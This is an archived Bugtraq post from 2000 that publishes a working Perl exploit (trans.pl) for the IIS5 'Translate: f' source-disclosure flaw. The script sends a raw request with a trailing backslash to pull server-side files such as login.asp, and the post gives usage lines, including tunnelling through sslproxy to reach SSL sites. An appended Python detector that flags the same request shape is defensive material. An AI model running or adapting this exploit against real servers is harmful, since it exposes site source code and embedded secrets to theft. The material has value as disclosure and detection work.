Bugtraq mailing list archives

Translate:f [another PERL exploit]


From: Roelof Temmingh <roelof () SENSEPOST COM>
Date: Fri, 18 Aug 2000 09:41:48 +0200

Below another PERL exploit:
Does not require LWP::UserAgent.
Will also work for virtually hosted sites.
Can easily be used against SSL sites (with the use of sslproxy)

Typical use:
perl trans.pl www.the_iis5_box.com login.asp 80

For use against SSL sites:
1) sslproxy -L 127.0.0.1 -l 7555 -R IP_of_iis5_box -r 443 -v Class3.pem
2) perl trans.pl 127.0.0.1 login.asp 7555

Use at own risk/etc etc.

Regards,
Roelof.

---cut: trans.pl---
#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp () wiretrip net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
---cut----
------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com                
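
A defensive check for the request shape that trans.pl sends (a GET whose path ends in a backslash, together with a "Translate: f" header), as an added example that is not part of the original post. The function names and sample requests are constructed for illustration, and treating the header alone as benign is an assumption.

```python
from urllib.parse import unquote

# Constructed sample requests (not captured traffic).
SCRIPT_SHAPED = (b"GET /login.asp\\ HTTP/1.0\r\nHost: www.example.com\r\n"
                 b"User-Agent: SensePostData\r\nTranslate: f\r\n\r\n")
ENCODED = b"GET /login.asp%5C?x=1 HTTP/1.0\r\nHost: a\r\ntranslate:  F \r\n\r\n"
WEBDAV_LIKE = b"GET /docs/report.doc HTTP/1.1\r\nHost: a\r\nTranslate: f\r\n\r\n"
BROWSER = b"GET /login.asp HTTP/1.1\r\nHost: a\r\nUser-Agent: Mozilla/4.0\r\n\r\n"

def parse_request(raw):
    """Split a raw HTTP request into (method, target, lower-cased headers)."""
    text = raw.replace(b"\r\n", b"\n").split(b"\n\n", 1)[0].decode("latin-1")
    lines = text.split("\n")
    method, _, rest = lines[0].partition(" ")
    if not method or not rest:
        raise ValueError("malformed request line")
    target = rest.rsplit(" HTTP/", 1)[0]  # tolerate spaces inside the target
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def indicators(raw):
    """List which parts of the trans.pl request shape are present."""
    _, target, headers = parse_request(raw)
    found = []
    if headers.get("translate", "").lower() == "f":
        found.append("translate-f")
    # Decode percent-escapes and ignore the query string before testing the path.
    if unquote(target.split("?", 1)[0]).endswith("\\"):
        found.append("trailing-backslash")
    if headers.get("user-agent") == "SensePostData":
        found.append("script-user-agent")
    return found

def is_match(raw):
    """Alert only on header and trailing backslash together; the header alone
    is treated as benign here (assumption: WebDAV clients send it routinely)."""
    return {"translate-f", "trailing-backslash"} <= set(indicators(raw))

if __name__ == "__main__":
    for name, req in [("script", SCRIPT_SHAPED), ("encoded", ENCODED),
                      ("webdav", WEBDAV_LIKE), ("browser", BROWSER)]:
        print(name, is_match(req), indicators(req))
```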